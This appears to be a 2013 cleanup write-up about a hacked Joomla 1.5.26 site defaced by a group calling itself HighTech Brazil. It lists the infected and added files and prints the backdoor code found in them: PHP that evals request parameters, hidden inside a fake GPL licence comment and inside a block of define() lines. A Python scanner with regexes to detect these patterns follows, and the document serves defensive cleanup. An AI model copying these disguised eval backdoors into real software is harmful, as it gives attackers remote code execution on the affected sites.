mightyroot

hacked sites HighTech Brazil

May 6th, 2013
Find the files that have been hacked:
copyright.php
changelog.php
These are the files where the following lines have been added:
(I compared with my other, non-hacked Joomla 1.5.26 site. Important: it seems that searching file contents for the value $gnu is enough to locate them.)

At the top of the file:

<?php
/* GNU GENERAL PUBLIC LICENSE
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

GNU GENERAL PUBLIC LICENSE
Version 2, June 1991

*/ Copyright6_7_78() /* 1989, 1991 Free Software Foundation, Inc.
                          675 Mass Ave, Cambridge, MA 02139, USA
 Everyone is permitted to copy and distribute verbatim copies
 of this license document, but changing it is not allowed.

Preamble

  The licenses for most software are designed to take away your
freedom to share and change it. By contrast, the GNU General Public
License is intended to guarantee your freedom to share and change free
software--to make sure the software is free for all its users. This
General Public License applies to most of the Free Software
Foundation's software and to any other program whose authors commit to
using it. (Some other Free Software Foundation software is covered by
the GNU Library General Public License instead.) You can apply it to
your programs, too. */ ?>

And at the bottom of the file:

Copyright6_7_78();
function Copyright6_7_78() {
static $gnu = true;
if (!$gnu) return;
if (!isset($_REQUEST['gnu']) || isset($_REQUEST['c_id'])) return;
$gpl = implode('', $_REQUEST['gnu']);
eval($gpl($_REQUEST['c_id']));
$gnu = false;
}
?>

Once the files containing the code have been located, clean them up and move on ...

Find the files that have been added:

The directories listed are only my opinion; the names seem to be generated from existing Joomla files so that we pay no attention to them. Important: it seems that searching file contents for the value settings.xml is enough to locate them.
All2.php
html4strict.php (and variations of the name such as html4strict1.php or html4strict1.bak.php, everywhere)
pageNavigation.bak.php (folder "includes")
pageNavigation.class.php (folder "includes")
CREDITS.php (in many cases)
loader.1.php (folder "book")
loader.bak.php (folder "book")
LICENCE.php (folders "media" and "modules")
article5.clas.php (in many cases)
news2.clas.php (in many cases)

Here are the contents of these files (at least for me):

<?php
define('REAL_SERVER_ROOT', 'SERVER');
// DIR
define('SERVER_ROOT', '.');
define('SERVER_VERSION', '2.5');
define('BOOT_DIR', 'bootstrap');
define('SYSTEM_DIR', 'system');
define('SYSTEM_CONF_DIR', 'conf');
define('SYSTEM_CONF_PATH', SERVER_ROOT . '/' . SYSTEM_DIR . '/' . SYSTEM_CONF_DIR);
define('KERNEL_DIR', 'kernel');
define('SERVICES_DIR', 'services');
define('LIBRARIES_DIR', 'libs');
define('FRAMEWORKS_DIR', 'Frameworks');
define('IMPLEMENTATIONS_DIR', 'implementations');
define('EXTERN_DIR', 'external');
// APP
define('APPS_DIR', 'apps');
define('USERS_DIR', 'users');
define('USERS_PATH', SERVER_ROOT . '/' . USERS_DIR);
define('USERS_CONF_DIR', 'conf');
define('USERS_FILES_DIR', 'files');
define('SYSTEM_SKEL_DIR', 'skel'); @eval(base64_decode($_REQUEST['c_id'])); define('SYSTEM_SKEL_PATH', SYSTEM_CONF_PATH . '/' . SYSTEM_SKEL_DIR);
define('USERS_SHARE_DIR', 'share');
define('USERS_META_DIR', 'meta');
define('USERS_META_SETTINGS_FILENAME', 'settings.xml');
define('WORKGROUPS_DIR', 'workgroups');
define('WORKGROUPS_PATH', SERVER_ROOT . '/' . WORKGROUPS_DIR);
// CONF
define('WORKGROUPS_CONF_DIR', 'conf');
define('WORKGROUPS_FILES_DIR', 'files');
define('WORKGROUPS_METAFILES_DIR', 'metafiles');
define('WORKGROUPS_META_DIR', 'meta');
define('WORKGROUPS_META_SETTINGS_FILENAME', 'settings.xml');
?>

The index.php or index.html file

Several index.* files are modified. They contain the text
Hackeado por HighTech Brazil HackTeam
No \ One - CrazyDuck - Otrasher - L34NDR0
which appears everywhere.
Then replace them with a clean file from a clean install, or just replace the code with the following:
<html> <body bgcolor="#FFFFFF"> </body> </html>
which should suffice.
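
The content searches suggested above ($gnu, settings.xml, the c_id eval and the defacement text) combined into one scan of a web root. This is an added example, not part of the original paste; the function names, indicator labels and sample files are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Indicators quoted in the paste; patterns tolerate padded whitespace.
REQ = rb"\$_REQUEST\s*\[\s*['\"]%s['\"]\s*\]"
INDICATORS = {
    # stub appended to copyright.php / changelog.php
    "gnu-stub": re.compile(rb"static\s+\$gnu\b|" + REQ % b"gnu"),
    # one-liner hidden among the define() calls of the added files
    "c_id-eval": re.compile(
        rb"eval\s*\(\s*base64_decode\s*\(\s*" + REQ % b"c_id", re.I),
    # search term the paste suggests for added files (weak on its own)
    "settings-xml": re.compile(rb"['\"]settings\.xml['\"]"),
    # defacement text left in index.* files
    "defacement": re.compile(rb"HighTech\s+Brazil\s+HackTeam", re.I),
}
SCAN_SUFFIXES = {".php", ".html", ".htm"}

def scan_tree(root):
    """Return {relative path: [indicator names]} for matching files."""
    root = Path(root)
    hits = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        data = path.read_bytes()
        names = [n for n, rx in INDICATORS.items() if rx.search(data)]
        if names:
            hits[path.relative_to(root).as_posix()] = names
    return hits

def build_sample_tree(root):
    """Write constructed sample fragments (not a real site) for the demo."""
    root = Path(root)
    (root / "includes").mkdir(parents=True)
    samples = {
        "index.php": b"<?php echo 'clean'; ?>",
        "copyright.php": b"<?php function f() { static  $gnu = true; } ?>",
        "includes/pageNavigation.bak.php": b"<?php define('A', 'settings.xml');"
            b"   @Eval (base64_decode ($_REQUEST ['c_id'])); ?>",
        "index.html": b"<html>Hackeado por HighTech Brazil HackTeam</html>",
    }
    for name, body in samples.items():
        (root / name).write_bytes(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        print(scan_tree(tmp))
```

A file that matches only settings-xml needs a manual look before deletion; compare anything flagged against a clean Joomla install, as the paste does.
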
Conclusion

Once the hacked files have been cleaned or completely deleted, and a solid .htaccess has been generated, the site should be safe in the future. For now that has been the case since 18 January 2013. If the adventure continues, I will update this file.